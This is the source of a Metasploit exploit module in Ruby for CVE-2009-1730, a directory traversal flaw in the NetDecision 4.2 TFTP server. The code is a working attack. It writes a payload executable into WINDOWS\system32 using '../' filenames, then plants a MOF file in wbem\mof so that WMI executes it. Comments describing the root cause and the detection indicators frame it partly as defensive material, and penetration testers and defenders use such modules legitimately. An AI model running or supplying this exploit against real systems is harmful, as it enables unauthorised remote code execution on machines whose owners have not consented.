Path: blob/master/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2009-1730: the NetDecision 4.2 TFTP server accepts
# write requests whose filename contains "../" sequences, so a remote client
# can place files outside the TFTP root.
#
# Defender notes (derived from what this file sends):
# * Root cause is missing path canonicalisation on the server side; a fixed
#   server must resolve the requested name and reject anything that lands
#   outside its root directory.
# * Observable artifacts are TFTP write requests with "../" in the filename,
#   a new randomly named .exe under WINDOWS\system32 and a new randomly named
#   .mof under WINDOWS\system32\wbem\mof.
# * The module metadata marks reliability, stability and side effects as
#   unknown, so leftover files on the target should be expected.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  # Registers module metadata and the DEPTH / RHOST / RPORT options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
        'Description' => %q{
          This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The
          software contains a directory traversal vulnerability that allows a remote attacker
          to write arbitrary file to the file system, which results in code execution under
          the context of user executing the TFTP Server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Rob Kraus', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2009-1730'],
          ['OSVDB', '54607'],
          ['BID', '35002']
        ],
        'Payload' => {
          'BadChars' => "\x00",
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Targets' => [
          ['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-05-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptInt.new('DEPTH', [false, "Levels to reach base directory", 1]),
      OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
      OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
    ])
  end

  # Sends +data+ to the configured TFTP server as a write request for
  # +filename+, in octet mode, from a random local port in 1025..65534.
  #
  # @param filename [String] remote file name requested from the server
  # @param data [String] file contents to transfer
  def upload(filename, data)
    client_opts = {
      "LocalHost" => "0.0.0.0",
      "LocalPort" => 1025 + rand(0xffff - 1025),
      "PeerHost" => datastore['RHOST'],
      "PeerPort" => datastore['RPORT'],
      # NOTE(review): the "DATA:" prefix presumably makes the Rex client send
      # this in-memory buffer instead of reading a local file; confirm in
      # Rex::Proto::TFTP::Client.
      "LocalFile" => "DATA:#{data}",
      "RemoteFile" => filename,
      "Mode" => "octet",
      "Context" => { 'Msf' => framework, "MsfExploit" => self },
      "Action" => :upload
    }
    client = Rex::Proto::TFTP::Client.new(client_opts)

    client.send_write_request { |msg| print_status(msg) }

    # Each pass waits one second and then calls stop; the loop ends once the
    # client reports the transfer as complete.
    until client.complete
      select(nil, nil, nil, 1)
      client.stop
    end
  end

  # Uploads two files through the traversal: a payload executable into
  # WINDOWS\system32 and a MOF file into WINDOWS\system32\wbem\mof.
  #
  # NOTE(review): generate_mof comes from the WbemExec mixin and is not shown
  # in this file; presumably the MOF it returns refers to the uploaded
  # executable by name, and WMI compiling it from wbem\mof is what runs the
  # payload.
  def exploit
    peer_label = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    # Both files get random alphabetic names of 5 to 14 characters, so
    # file-name signatures are of little use for detection; the target
    # directories and the "../" prefix are the stable indicators.
    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
    exe = generate_payload_exe
    mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
    mof = generate_mof(mof_name, exe_name)

    # DEPTH unset or 0 falls back to 10 "../" levels.
    configured_depth = datastore['DEPTH']
    depth = configured_depth.nil? || configured_depth == 0 ? 10 : configured_depth
    levels = "../" * depth

    # First write: the executable, into WINDOWS\system32.
    print_status("#{peer_label} - Uploading executable (#{exe.length} bytes)")
    upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)

    # One-second pause so the TFTP server is idle before the second transfer.
    select(nil, nil, nil, 1)

    # Second write: the MOF, into WINDOWS\system32\wbem\mof.
    print_status("#{peer_label} - Uploading .mof...")
    upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
  end
end